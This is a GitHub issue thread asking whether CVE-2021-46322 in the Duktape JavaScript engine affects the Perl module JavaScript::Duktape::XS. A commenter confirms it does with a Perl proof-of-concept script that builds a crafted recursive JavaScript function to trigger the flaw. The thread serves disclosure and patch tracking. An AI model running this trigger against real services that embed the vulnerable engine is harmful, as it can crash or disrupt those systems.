We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Does CVE-2021-46322 affect this? See svaarala/duktape#2448 which should affect all v2.2 versions.
I have verified that it does:
use JavaScript::Duktape::XS; my $js = JavaScript::Duktape::XS->new(); $js->eval( << "POS" function JSEtest() { var src = []; var i; src.push('(function test() {'); for (i = 0; i < 1e4; i++) { src.push('var x' + i + ' = ' + i + ';'); } src.push('var arguments = test(); return "dummy"; })'); src = src.join(''); var f = eval(src)(src); try { f(); } catch (e) { print(e.name + ': ' + e.message); } print('still here'); } try { JSEtest(); } catch (e) { print(e.stack || e); } POS );
The text was updated successfully, but these errors were encountered:
Add review to JavaScript-Duktape-XS CVE
89ef981
I have verified that this is an issue, and created a ticket gonzus/JavaScript-Duktape-XS#33
Successfully merging a pull request may close this issue.
Does CVE-2021-46322 affect this? See svaarala/duktape#2448 which should affect all v2.2 versions.
I have verified that it does:
The text was updated successfully, but these errors were encountered: